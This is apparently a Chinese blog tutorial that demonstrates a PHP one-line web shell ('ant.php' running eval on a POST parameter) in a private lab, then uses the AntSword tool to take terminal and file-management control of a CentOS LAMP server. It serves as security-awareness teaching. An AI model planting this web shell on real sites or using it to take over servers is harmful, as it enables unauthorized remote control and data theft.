网络安全演练(一句话木马)

在享受互联网带来的便利的同时,也充满了各种网络安全风险,本文通过搭建实验环境,演示一句话木马获取主机权限。

演示环境

服务端:安装LAMP环境,部署web网站,上传一句话木马文件

客户端:安装AntSword(蚁剑)

环境准备

服务器准备

基本信息

操作系统:centos7

ip:192.168.21.131

网站部署:LAMP

方法一:XAMPP部署,参考--php开发环境部署(xampp)-CSDN博客

方法二:宝塔面板部署,参考--宝塔面板(服务器管理)-CSDN博客

制作一句话木马文件

文件名:ant.php

文件内容:<?php @eval($_POST['php']); ?>

客户端准备

基本信息

操作系统:windows 10

ip:192.168.21.130

安装蚁剑渗透测试工具

参考:渗透测试工具(AntSword)-CSDN博客

演示

centos7系统,采用XAMPP安装方式已部署好LAMP环境

bash 复制代码
[root@192 ~]# /opt/lampp/lampp status
Version: XAMPP for Linux 8.2.4-0
Apache is running.
MySQL is running.
ProFTPD is running.

页面访问正常

将ant.php文件上传到网站根目录

本次演示为手动将文件上传到网站根目录,也可以部署dvwa渗透测试环境,通过文件上传功能上传木马文件,本文不作演示

dvwa渗透测试环境部署参考:dvwa渗透测试环境部署-CSDN博客

bash 复制代码
[root@192 ~]# cat /opt/lampp/htdocs/ant.php 
<?php @eval($_POST['php']); ?>
[root@192 ~]# 

浏览器访问ant.php文件,状态码返回200

客户端电脑打开"蚁剑"工具,添加数据"http://192.168.21.131/ant.php"

在空白处右击,然后点击"添加数据"

如下图所示,填写url地址和密码(一句话木马文件中定义的密码"php"),然后依次点击"测试连接"和"添加"

右击选中的数据,然后点击"虚拟终端"

获取到了终端权限

右击选中数据,点击"文件管理"

获取了文件管理权限

总结

网络安全风险无处不在,我们应当加强防护,但也不必太过担心,网络攻击成功必须天时地利人和,只要我们做好安全防护,也不会轻易被攻击。

内容导览:计算机网络基础、进阶、安全实践

相关推荐
寻星探路2 小时前
【深度长文】万字攻克网络原理:从 HTTP 报文解构到 HTTPS 终极加密逻辑
java·开发语言·网络·python·http·ai·https
Binary-Jeff2 小时前
一文读懂 HTTPS 协议及其工作流程
网络协议·web安全·http·https
Hello.Reader5 小时前
Flink ZooKeeper HA 实战原理、必配项、Kerberos、安全与稳定性调优
安全·zookeeper·flink
智驱力人工智能5 小时前
小区高空抛物AI实时预警方案 筑牢社区头顶安全的实践 高空抛物检测 高空抛物监控安装教程 高空抛物误报率优化方案 高空抛物监控案例分享
人工智能·深度学习·opencv·算法·安全·yolo·边缘计算
盟接之桥6 小时前
盟接之桥说制造:引流品 × 利润品,全球电商平台高效产品组合策略(供讨论)
大数据·linux·服务器·网络·人工智能·制造
数据与后端架构提升之路6 小时前
论系统安全架构设计及其应用(基于AI大模型项目)
人工智能·安全·系统安全
会员源码网6 小时前
理财源码开发:单语言深耕还是多语言融合?看完这篇不踩坑
网络·个人开发
米羊1217 小时前
已有安全措施确认(上)
大数据·网络
市场部需要一个软件开发岗位8 小时前
JAVA开发常见安全问题:Cookie 中明文存储用户名、密码
android·java·安全
lingggggaaaa8 小时前
安全工具篇&动态绕过&DumpLsass凭据&Certutil下载&变异替换&打乱源头特征
学习·安全·web安全·免杀对抗